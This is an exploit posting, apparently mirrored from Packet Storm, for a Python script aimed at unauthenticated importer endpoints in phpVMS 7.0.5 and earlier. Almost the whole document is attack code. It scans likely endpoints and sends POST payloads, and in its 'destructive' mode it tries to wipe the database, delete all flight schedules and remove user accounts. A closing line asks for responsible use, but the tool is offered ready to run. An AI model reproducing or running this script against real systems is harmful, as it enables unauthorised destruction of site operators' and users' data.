Share
## https://sploitus.com/exploit?id=PACKETSTORM:223017
==================================================================================================================================
| # Title : phpVMS โค 7.0.5 Unauthenticated Import Endpoint Bypass |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://phpvms.net/ |
==================================================================================================================================
[+] Summary : This script is an active vulnerability testing and exploitation tool targeting phpVMS โค 7.0.5.
It scans multiple importer-related endpoints, attempts POST-based actions that simulate or trigger destructive
operations (such as import, delete, and database wipe behaviors), and classifies a target as vulnerable based on HTTP responses and keyword indicators.
[+] POC :
#!/usr/bin/env python3
"""
Affected: phpVMS โค 7.0.5
Patched: phpVMS 7.0.6+
"""
import requests
import sys
import time
import argparse
from urllib.parse import urljoin
try:
from colorama import init, Fore, Style
init(autoreset=True)
COLORS = True
except ImportError:
COLORS = False
class Fore:
RED = GREEN = YELLOW = CYAN = ''
class Style:
RESET_ALL = ''
def colorize(text, color):
if COLORS:
return f"{color}{text}{Style.RESET_ALL}"
return text
def banner():
banner_text = """
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ CVE-2026-42569 - phpVMS RCE/Destructive โ
โ Unauthenticated Legacy Importer Access โ
โ By indoushka โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
"""
print(colorize(banner_text, Fore.RED))
def test_endpoint(target, endpoint, timeout=10, verify_ssl=False):
"""Test a single endpoint for vulnerability"""
url = urljoin(target.rstrip('/') + '/', endpoint.lstrip('/'))
print(colorize(f"[*] Testing: {url}", Fore.YELLOW))
headers = {
"User-Agent": "Mozilla/5.0 (CVE-2026-42569 Scanner)",
"Content-Type": "application/x-www-form-urlencoded"
}
test_payloads = [
{
"name": "basic_access",
"data": {},
"method": "GET"
},
{
"name": "import_trigger",
"data": {
"action": "import",
"type": "full",
"confirm": "true"
},
"method": "POST"
},
{
"name": "delete_trigger",
"data": {
"action": "delete_all",
"confirm": "yes"
},
"method": "POST"
},
{
"name": "truncate_schedules",
"data": {
"action": "clear_schedules",
"_token": "bypass"
},
"method": "POST"
}
]
vulnerable = False
results = []
for payload in test_payloads:
try:
if payload["method"] == "GET":
r = requests.get(url, headers=headers, timeout=timeout,
verify=verify_ssl, allow_redirects=True)
else:
r = requests.post(url, headers=headers, data=payload["data"],
timeout=timeout, verify=verify_ssl,
allow_redirects=True)
indicators = [
"success" in r.text.lower(),
"imported" in r.text.lower(),
"deleted" in r.text.lower(),
"truncat" in r.text.lower(),
"completed" in r.text.lower(),
"database" in r.text.lower() and ("clear" in r.text.lower() or "wipe" in r.text.lower())
]
if r.status_code in [200, 301, 302, 307, 308]:
if any(indicators) or len(r.text) > 200:
vulnerable = True
results.append({
"payload": payload["name"],
"status": r.status_code,
"indicators": [ind for ind in indicators if ind][:3]
})
elif r.status_code == 403:
print(colorize(f" [!] Endpoint exists but returned 403 (may still be vulnerable in older versions)", Fore.YELLOW))
except requests.exceptions.ConnectionError:
print(colorize(f" [-] Connection error - target may be down", Fore.RED))
except requests.exceptions.Timeout:
print(colorize(f" [-] Timeout on {url}", Fore.RED))
except Exception as e:
print(colorize(f" [-] Error: {str(e)[:50]}", Fore.RED))
return vulnerable, results
def attempt_exploit(target, endpoint, destructive=False, timeout=10):
"""Attempt to exploit the vulnerability with destructive actions"""
if destructive:
print(colorize("\n[!!!] DESTRUCTIVE MODE ENABLED - THIS WILL DAMAGE DATA [!!!]", Fore.RED))
confirm = input(colorize("Type 'CONFIRM_DESTROY' to continue: ", Fore.RED))
if confirm != "CONFIRM_DESTROY":
print(colorize("[*] Destructive operation cancelled.", Fore.YELLOW))
return False
url = urljoin(target.rstrip('/') + '/', endpoint.lstrip('/'))
dangerous_payloads = [
{
"name": "FULL_DATABASE_WIPE",
"data": {
"action": "full_import",
"wipe_first": "true",
"confirm": "yes",
"force": "1"
},
"description": "Attempts to wipe entire database"
},
{
"name": "DELETE_ALL_FLIGHTS",
"data": {
"action": "import_schedules",
"clear_existing": "on",
"submit": "Import"
},
"description": "Deletes all flight schedules"
},
{
"name": "TRUNCATE_USERS",
"data": {
"action": "import_users",
"replace": "all",
"_method": "DELETE"
},
"description": "Removes user accounts"
}
]
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"Content-Type": "application/x-www-form-urlencoded",
"X-Requested-With": "XMLHttpRequest"
}
success_count = 0
for payload in dangerous_payloads:
print(colorize(f"\n[*] Attempting: {payload['name']}", Fore.MAGENTA))
print(colorize(f" Description: {payload['description']}", Fore.CYAN))
try:
r = requests.post(url, headers=headers, data=payload["data"],
timeout=timeout, verify=False, allow_redirects=True)
if r.status_code in [200, 302]:
print(colorize(f" [+] Payload delivered - Check target for damage", Fore.RED))
success_count += 1
else:
print(colorize(f" [-] Failed with status: {r.status_code}", Fore.YELLOW))
except Exception as e:
print(colorize(f" [-] Error: {str(e)[:50]}", Fore.RED))
return success_count > 0
def scan_common_endpoints(target):
"""Scan common vulnerable endpoint patterns"""
endpoints = [
"/importer",
"/importer/index",
"/importer/index.php",
"/import",
"/import/index",
"/legacy/importer",
"/admin/importer",
"/install/importer",
"/public/importer",
"/index.php/importer",
"/index.php/import",
"/?module=importer",
"/index.php?module=import",
"/legacy/import",
"/tools/importer",
"/maintenance/import",
]
vulnerable_endpoints = []
for endpoint in endpoints:
vulnerable, results = test_endpoint(target, endpoint)
if vulnerable:
vulnerable_endpoints.append({
"endpoint": endpoint,
"results": results
})
print(colorize(f"\n[+] VULNERABLE: {endpoint}", Fore.GREEN))
for result in results:
print(colorize(f" - Payload '{result['payload']}' triggered (Status: {result['status']})", Fore.GREEN))
else:
print(colorize(f"[-] Not vulnerable: {endpoint}", Fore.RED))
return vulnerable_endpoints
def check_version(target):
"""Try to detect phpVMS version from response headers or content"""
version_indicators = [
"/admin/settings",
"/VERSION",
"phpVMS",
"phpvms"
]
print(colorize("\n[*] Attempting version detection...", Fore.CYAN))
try:
r = requests.get(target, timeout=10, verify=False)
if "phpVMS" in r.text:
import re
version_match = re.search(r'phpVMS[^\d]*(\d+\.\d+\.\d+)', r.text, re.I)
if version_match:
version = version_match.group(1)
print(colorize(f"[+] Detected phpVMS version: {version}", Fore.CYAN))
if version <= "7.0.5":
print(colorize(f"[!] Version {version} is VULNERABLE!", Fore.RED))
else:
print(colorize(f"[*] Version {version} appears patched", Fore.GREEN))
return version
if 'X-Powered-By' in r.headers:
if 'phpVMS' in r.headers['X-Powered-By']:
print(colorize(f"[+] Header reveals phpVMS installation", Fore.CYAN))
except Exception as e:
print(colorize(f"[-] Version detection failed: {e}", Fore.YELLOW))
return None
def exploit(target, destructive=False, scan_all=False):
print(colorize(f"[*] Targeting: {target}", Fore.CYAN))
version = check_version(target)
if version and version > "7.0.5":
print(colorize(f"[!] Target appears patched. Proceeding with caution...", Fore.YELLOW))
if scan_all:
print(colorize("\n[*] Running full endpoint scan...", Fore.CYAN))
vulnerable_endpoints = scan_common_endpoints(target)
else:
print(colorize("\n[*] Testing common endpoints...", Fore.CYAN))
endpoints = ["/importer", "/import", "/legacy/importer"]
vulnerable_endpoints = []
for endpoint in endpoints:
vulnerable, results = test_endpoint(target, endpoint)
if vulnerable:
vulnerable_endpoints.append({"endpoint": endpoint, "results": results})
if vulnerable_endpoints:
print(colorize("\n" + "="*60, Fore.RED))
print(colorize("[!!!] SYSTEM IS VULNERABLE TO CVE-2026-42569 [!!!]", Fore.RED))
print(colorize("="*60, Fore.RED))
for vuln in vulnerable_endpoints:
print(colorize(f"\n[+] Vulnerable endpoint: {vuln['endpoint']}", Fore.RED))
for result in vuln['results']:
print(colorize(f" - {result['payload']} payload succeeded", Fore.YELLOW))
print(colorize("\n" + "="*60, Fore.RED))
print(colorize("IMPACT: Unauthenticated database wipe/delete possible", Fore.RED))
print(colorize("="*60, Fore.RED))
if destructive and vulnerable_endpoints:
print(colorize("\n[*] Preparing exploitation sequence...", Fore.MAGENTA))
for vuln in vulnerable_endpoints:
print(colorize(f"\n[*] Exploiting: {vuln['endpoint']}", Fore.MAGENTA))
attempt_exploit(target, vuln['endpoint'], destructive=True)
else:
print(colorize("\n[*] No vulnerable endpoints detected", Fore.GREEN))
print(colorize("[*] Target may be patched or configured securely", Fore.GREEN))
def main():
banner()
parser = argparse.ArgumentParser(
description='CVE-2026-42569 - phpVMS Unauthenticated Import Endpoint Bypass',
epilog='Example: python3 CVE-2026-42569.py http://target.com --destructive'
)
parser.add_argument('target', help='Target URL (e.g., http://target.com)')
parser.add_argument('--destructive', '-d', action='store_true',
help='Enable destructive exploitation (WILL DAMAGE DATA)')
parser.add_argument('--scan-all', '-s', action='store_true',
help='Scan all common endpoint variations')
parser.add_argument('--timeout', '-t', type=int, default=10,
help='Request timeout in seconds (default: 10)')
args = parser.parse_args()
if not args.target.startswith(('http://', 'https://')):
args.target = 'http://' + args.target
try:
exploit(args.target, args.destructive, args.scan_all)
except KeyboardInterrupt:
print(colorize("\n[*] Scan interrupted by user", Fore.YELLOW))
sys.exit(0)
print(colorize("\n" + "="*60, Fore.RED))
print(colorize("REMINDER: This vulnerability can cause COMPLETE DATABASE DELETION", Fore.RED))
print(colorize("Use responsibly and only on authorized targets.", Fore.RED))
print(colorize("="*60, Fore.RED))
if __name__ == "__main__":
if len(sys.argv) == 1:
print("Usage: python3 CVE-2026-42569.py <target> [options]")
print("\nBasic scan:")
print(" python3 CVE-2026-42569.py http://phpvms.example.com")
print("\nFull scan:")
print(" python3 CVE-2026-42569.py http://phpvms.example.com --scan-all")
print("\nDestructive mode (WILL DAMAGE DATA):")
print(" python3 CVE-2026-42569.py http://phpvms.example.com --destructive")
print("\nOptions:")
print(" --destructive, -d Enable destructive exploitation")
print(" --scan-all, -s Scan all endpoint variations")
print(" --timeout, -t Request timeout in seconds")
sys.exit(1)
main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================